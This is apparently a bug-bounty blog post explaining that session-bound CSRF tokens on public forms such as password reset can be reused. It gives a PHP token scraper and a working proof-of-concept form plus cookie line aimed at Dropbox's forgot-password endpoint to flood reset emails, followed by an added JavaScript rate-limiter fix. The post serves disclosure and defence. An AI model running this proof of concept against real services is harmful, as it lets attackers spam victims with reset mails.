Every CSRF token need not be verified in order to prevent CSRF

Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user’s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. – Wikipedia


I had a couple of interesting encounters with CSRF last week; one of them is yet to be fixed. Here is an interesting low-impact issue.

These days almost every form on a website uses CSRF protection by default. Every time a page loads, the CSRF token should be different/unique/unpredictable. But this is not the case with 80% of the websites out there. I'll explain this with two examples: one is Dropbox and the other is move-app (Facebook).

Let’s start.

Most dynamic websites have sign-in functionality as well as a forgot-password form to recover the account.

"Most of the forgot password forms are vulnerable by design; a good practice is to ask a security question before sending the reset link." – Aditya

My area of interest was the CSRF token for visitors, i.e. public forms like reset password, sign in, feedback and so on. These tokens are session based (the session starts when the site loads and lasts until you close the browser).

The issue was that the token remains the same for a particular session. For example, when you submit a reset password request the first time, the token is x; now every time you request a password reset, the token will be the same x.

I thought to abuse this: I made a PHP crawler that crawls the hidden CSRF value, and thought to add the token field to my CSRF form. Here is the PHP code to extract all the input values from Coinbase.

$url = 'https://example.com/forgot'; // placeholder: the page whose form you want to inspect
$html = file_get_contents($url);

$doc = new DOMDocument();
libxml_use_internal_errors(true);   // real-world HTML is rarely well-formed; don't abort on warnings
$doc->loadHTML($html);
$tags = $doc->getElementsByTagName('input');

foreach ($tags as $tag) {
    // print name|value for every input, so the hidden CSRF field stands out
    $x = $tag->getAttribute('name') . '|' . $tag->getAttribute('value') . "\n";
    echo $x;
}

I tried to submit my form with the scraped CSRF token, a badass idea. It didn't work, because my page was not creating any session.

Now the goal was clear: I had to use my own session to abuse the CSRF protection. So what I did was copy my cookie and token, set the cookie with document.cookie along with the token value, and this time, Bingo!

In the case of Dropbox, they have a js_csrf key in the cookie which contains the value of the CSRF token. A full POC for Dropbox is here. Go to the forgot password page, copy the cookie and token, replace the cookie below with your cookie and the token with your token, and use it for as long as you don't close the browser.

document.cookie="locale=en; gvc=MjY5NTY5NDI1ODg1MjkwOTc5MjU4MTMwMDAwMjQzNTA1ODg0NDM%3D; t=JK3SHAeVr2aKEoysoY5vSTOZ; js_csrf=AI2FTNdJcwJ9rgv-uA_Um_Bi; _ga=GA1.2.1136221818.1422608131; _dc_gtm_UA-279179-2=1; __ar_v4=D33PO2KM7ZEHNI2NW5CGWR%3A20150201%3A4%7C56766LR465ARRDJLPT63JW%3A20150201%3A4%7CU7C3RGPYVFBRPNTVQLPXAB%3A20150201%3A4; _gali=page-content"

<form action="https://www.dropbox.com/forgot" method="post" name="manish">
<input type="hidden" name="t" value="AI2FTNdJcwJ9rgv-uA_Um_Bi" />
<input type="hidden" name="confirm" value="go" id="action" />
<input type="hidden" name="is_reset" value="False" id="action" />
<input type="hidden" id="pyxl4173474534052041227" name="email" value="xyz@gmail.com" />
</form>


The CSRF token is stored in the cookie; change the email field to any known email associated with Dropbox and every time you reload this page, they will get a reset link.

In the case of move app, there was no CSRF field in the cookie, but the token was still cookie (session) based. The same POC will work for move as well, except that they don't store a CSRF field in the cookie.

So what's the big deal? I can use my own session to abuse the CSRF protection in this case and send any number of reset links (Burp Repeater is another option, but Burp has some setting issue with most RoR applications).

Dropbox, Facebook, Asana, Coinbase and a lot more have confirmed the issue, but they said this is low priority. They marked it won't fix and I went down a few ranks on HackerOne.


The issue is with almost 80% of websites; most of them say they have a rate limiting scheme. Then why is CSRF protection used?

HackerOne's implementation is the standard CSRF token implementation: every time a page loads you get a new CSRF token. Any other possibility to abuse this?
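A CSRF token only proves that the request came from a page the site itself served to that session; it says nothing about how many reset requests the session may make, which is exactly the budget the vendors' rate limiting scheme is meant to enforce. As an added example in JavaScript, not from the original post, here is a sliding-window limiter applied to a forgot-password handler with two independent budgets (the limits, the window, the key names and the sendMail callback are assumptions chosen for illustration).

```javascript
// Sliding-window counter: at most `limit` hits per key in the last `windowMs`.
class SlidingWindowLimiter {
  constructor(limit, windowMs) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.hits = new Map(); // key -> array of hit timestamps (ms)
  }

  // Records the hit and returns true if it is within budget, false otherwise.
  allow(key, nowMs) {
    const cutoff = nowMs - this.windowMs;
    const recent = (this.hits.get(key) || []).filter((t) => t > cutoff);
    if (recent.length >= this.limit) {
      this.hits.set(key, recent);
      return false;
    }
    recent.push(nowMs);
    this.hits.set(key, recent);
    return true;
  }
}

// Builds a forgot-password handler with two independent budgets:
//  - per target address, so one mailbox cannot be flooded from any number of sessions;
//  - per requesting session, so one session cannot spray many addresses.
// Limits, window and the sendMail callback are illustrative assumptions.
function createResetHandler({ perEmailLimit = 3, perSessionLimit = 10,
                              windowMs = 60 * 60 * 1000, sendMail }) {
  const perEmail = new SlidingWindowLimiter(perEmailLimit, windowMs);
  const perSession = new SlidingWindowLimiter(perSessionLimit, windowMs);

  // Assumes the session and CSRF token were already checked upstream;
  // that check proves origin, not volume, which is what this handler bounds.
  return function requestPasswordReset(sessionId, email, nowMs) {
    const target = email.trim().toLowerCase();
    if (!perSession.allow(sessionId, nowMs)) {
      return { status: 'rate_limited', reason: 'session' };
    }
    if (!perEmail.allow(target, nowMs)) {
      return { status: 'rate_limited', reason: 'email' };
    }
    sendMail(target);
    return { status: 'accepted' };
  };
}

// Replays the scenario from the post with constructed input: one session
// reloading the same reset form five times in five seconds, then once more an hour later.
function simulateFlood() {
  const sent = [];
  const reset = createResetHandler({ sendMail: (addr) => sent.push(addr) });
  const statuses = [];
  for (let i = 0; i < 5; i++) {
    statuses.push(reset('session-A', 'victim@example.com', i * 1000).status);
  }
  const anHourLater = reset('session-A', 'victim@example.com', 60 * 60 * 1000 + 1).status;
  return { statuses, anHourLater, mailsSent: sent.length };
}

console.log(simulateFlood());
```

With these defaults the fourth and fifth reloads are refused on the per-address budget while the session budget is still untouched, and the request an hour later is accepted again once the oldest hit has left the window. Keying on the normalised target address is what matters for the case in the post: a per-session or per-IP limit alone is sidestepped by simply opening new sessions.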


